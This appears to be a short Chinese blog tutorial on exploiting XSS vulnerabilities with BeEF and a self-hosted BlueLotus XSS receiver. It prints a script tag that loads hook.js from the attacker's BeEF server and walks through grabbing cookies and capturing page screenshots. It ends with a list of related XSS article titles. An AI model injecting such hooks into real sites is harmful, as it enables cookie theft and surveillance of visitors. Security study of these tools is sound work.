前言
经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个:
1.kali下的beef
(1)kali命令行里输入beef-xss,得到一个脚本
<script src="http://127.0.0.1:3000/hook.js"></script>
将127.0.0.1改为kali的ip,之后进行植入

(2)kali命令行里输入beef-xss,得到beef管理网址http://127.0.0.1:3000/ui/panel,访问就可以对刚刚植入代码的机器进行攻击
例如获取cookie:

2.BlueLotus_XSSReceiver搭建的XSS平台
(1)在github搜索BlueLotus_XSSReceiver,下载环境BlueLotus_XSSReceiver-master,放到www目录下,之后安装
(2)安装好之后新建一个js,直接引用模板,此处引用将当前页面生成一张截图的模板screenshot,输入网站路径,点击生成payload
(3)植入代码:

(4)接收面板里可看到数据回显,返回的内容即为base64编码后的截图

xss漏洞之——XSS平台搭建相关推荐

  1. 利用xss漏洞结合xss平台实现社工钓鱼

    本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它 ...

  2. 安鸾靶场之XSS漏洞_交友平台

    本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag 提示flag在服务器根目录 出于学习目的,由于本人也是小白,错误的地方望指点 参考链接:MD5截断比较验证 - Ye'sBlog - ...

  3. url存在宽字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0

    点击上方"公众号" 可以订阅哦! Hello,各位小伙伴周五晚上好~ 终于到了XSS漏洞的完结篇啦~~ 感觉本公众号写的最多的就是XSS,现在可以告一段落了... 让我们来看看第一 ...

  4. XSS漏洞,通过XSS实现网页挂马

    **今天讲下通过XSS实现网页挂马~*,目的是了解安全方面知识,提升生活网络中辨别度 原理: 实验分为两部分: 1.通过Kali linux,利用MS14_064漏洞,制作一个木马服务器.存在该漏洞的 ...

  5. web漏洞-xss漏洞

    web漏洞-xss漏洞 文章目录 web漏洞-xss漏洞 前言 xss介绍 什么是xss xss漏洞产生原因 xss漏洞危害 xss漏洞分类 反射型xss 存储型xss DOM型xss xss漏洞防护 ...

  6. 【XSS漏洞-01】XSS漏洞简介、危害与分类及验证

    目录 1 XSS漏洞简介 2 XSS漏洞危害 3 XSS漏洞分类 3.1 反射型XSS 3.2 存储型XSS 3.3 DOM型XSS 3.3.1 节点树模型 3.3.2 DOM型XSS 4 漏洞验证 ...

  7. ctfshow XSS漏洞web316-328

    XSS漏洞 漏洞简介: XSS(Cross Site Scripting)意为跨站脚本攻击.为了不与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写 ...

  8. 浏览器安全与XSS漏洞

    文章目录 浏览器安全测试 1.同源策略 1.1意义 1.2目的 1.3注意 2.浏览器沙箱 2.2设计目的 2.3多进程架构 2.4好处 三.恶意网站拦截 1.别的威胁 跨站脚本(XSS)漏洞 1.介 ...

  9. XSS漏洞原理及攻击

    XSS漏洞原理 XSS介绍 XSS漏洞介绍 1. 跨站脚本(Cross-Site Scripting),简称为XSS或CSS或跨站脚本攻击,是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种. ...

最新文章

  1. android的 selector 背景选择器和 shape 详解(转)
  2. LeetCode SQL 196. 删除重复的电子邮箱
  3. 什么是 SAP Business Function
  4. python txt转dataframe_Python格式化解析不规则txt文本并转为dataframe
  5. 蓝桥杯 ADV-169 算法提高 士兵排队问题
  6. 运行 ROS-Academy-for-Beginners
  7. opengl魔方文档_基于OpenGL的3D旋转魔方的实现.doc
  8. hdu 5025 Saving Tang Monk 状态压缩dp+广搜
  9. 移动硬盘读取速度一般是多少
  10. 热点drcom 破解
  11. 德州学院计算机专业怎样,2017德州学院各专业录取分数线
  12. 《C++语言基础》网络课程主页
  13. 前端基础 CSS 第十一章 使用CSS样式表 ----暑假学习第七、八天
  14. BAT企业招聘的职位里,60%以上都在招大数据人才!
  15. 云队友丨他是前斯坦福大学校长,谷歌母公司Alphabet现任董事长,他说谦逊是有效领导力的基础
  16. 思考乐教育的荣耀与忧虑:整体增速放缓,异地扩张未见成效
  17. Mac下的破解软件真的安全吗?
  18. sql server 64位导入数据源中没有excel_【超级软件】PDFXEdit7Portable x32/64位
  19. 转 胡适《独立评论》,给自己的激励
  20. 设计心理学之席克定律和面部辨识

热门文章

  1. 不能卸载java_java不能完全卸载了,怎么处理???跪求高手指教11
  2. wampserver3.2.6切换中文报错处理方法以及中文版升级补丁
  3. MyCat (一) Mycat的安装
  4. 2022新超级蜘蛛池站群优化网站系统源码
  5. python算法一:枚举法
  6. 枚举法——python
  7. 剑指offer-跳楼梯和变态跳楼梯(C++)
  8. Plugin xxx was was not found in any of the following sources:
  9. 简述你计划使用的应用开发框架,及该框架的特点
  10. 国内首个ChatGPT镜像系统?辅助写代码真方便